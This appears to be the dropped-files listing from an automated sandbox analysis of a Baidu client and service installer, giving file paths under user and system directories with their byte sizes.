%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db-journal (21734 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\bd0001.sys (72 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\ProtocolDll.dll (3880 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Utils.dll (23296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.atl\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\BDCEnhance.sys (183 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\msvcr100.dll (25824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\bduniptk.sys (267 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\BDCEnhance.sys (112 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\msvcr80.dll (3705 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000301_ad.dat (238 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\uninst.exe (227 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\config.xml (459 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\BaseDll.dll (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (447624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\BugReport.exe (1777 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130892497757287500.dat (221 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\PluginFrame.dll (3786 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\res\InstallWnd.zip (3616 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\BDCEnhance.sys (673 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\ArKit.dll (90 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\DriverManager.dll (160 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\BDArKit.sys (140 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\FileRecov.dll (189 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
%System%\drivers\bduniptk.sys (1425 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\bcservice.exe (1695 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000301.dat (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f\LKHelper.7z (15801 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\DownloadDll.dll (99 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.atl\atl80.dll (97 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000302_ad.dat (121 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\msvcp80.dll (1835 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\ReportRecordDll.dll (115 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\ReportDll.dll (140 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\APIMgr.dll (201 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
